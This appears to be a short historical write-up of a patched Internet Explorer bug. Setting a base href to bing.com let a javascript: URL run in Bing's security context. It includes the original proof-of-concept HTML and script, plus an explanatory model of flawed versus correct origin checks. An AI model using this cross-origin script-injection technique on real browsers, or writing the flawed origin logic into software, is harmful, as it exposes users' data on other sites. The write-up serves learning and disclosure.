Setting a <base href> to a target origin and then opening a javascript: URL into a named window that held a page from that origin executed the script in the target’s security context. The base href caused IE to resolve the javascript: protocol’s origin as the base domain rather than the actual page.

<base href="http://www.bing.com/">

<script language="JavaScript">
function main()
{
	win = window.open("search?q=ie", "NEW_WIN");
	window.open("javascript:alert(document.URL);alert(document.body.innerHTML);","NEW_WIN");
}
</script>

The first window.open opened a relative URL (search?q=ie) which, because of the <base href>, resolved to http://www.bing.com/search?q=ie and loaded in NEW_WIN. The second window.open targeted the same NEW_WIN with a javascript: URL. IE resolved the javascript: protocol’s origin against the base href — bing.com — and allowed it to execute in that window’s context, exposing document.body.innerHTML from Bing’s page.
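The two origin decisions described above can be contrasted in a small model. This is an added example, not code from the original post and not IE's implementation; the document/window objects, the function names and the attacker.example host are constructed for illustration. It shows that a base href should only influence relative URL resolution, while the check for running a javascript: URL in another window must use the initiating document's own URL.

```javascript
// Simplified model (assumption): a document is { url, baseHref },
// a window is { name, doc }. Only the origin decision is modelled.

// <base href> legitimately changes how relative URLs resolve.
function resolveUrl(doc, relative) {
  return new URL(relative, doc.baseHref || doc.url).href;
}

// Flawed: derives the initiator's security origin from the base URL,
// which is the behaviour the post describes.
function initiatorOriginFlawed(doc) {
  return new URL(doc.baseHref || doc.url).origin;
}

// Correct: the security origin comes from the document's own URL only.
function initiatorOriginCorrect(doc) {
  return new URL(doc.url).origin;
}

// A javascript: URL runs inside the target window's document, so it is only
// acceptable when the initiator is same-origin with that document.
function mayRunJavascriptUrl(initiator, target, originOf) {
  return originOf(initiator) === new URL(target.doc.url).origin;
}

// Constructed sample: a page on another host declaring the base from the PoC.
const poc = { url: "http://attacker.example/poc.html", baseHref: "http://www.bing.com/" };
const newWin = { name: "NEW_WIN", doc: { url: resolveUrl(poc, "search?q=ie"), baseHref: null } };

// A genuine same-origin opener must still pass the correct check.
const sameOrigin = { url: "http://www.bing.com/index.html", baseHref: null };

function demo() {
  return {
    loaded: newWin.doc.url,
    flawed: mayRunJavascriptUrl(poc, newWin, initiatorOriginFlawed),
    correct: mayRunJavascriptUrl(poc, newWin, initiatorOriginCorrect),
    legit: mayRunJavascriptUrl(sameOrigin, newWin, initiatorOriginCorrect),
  };
}

console.log(demo());
```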

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.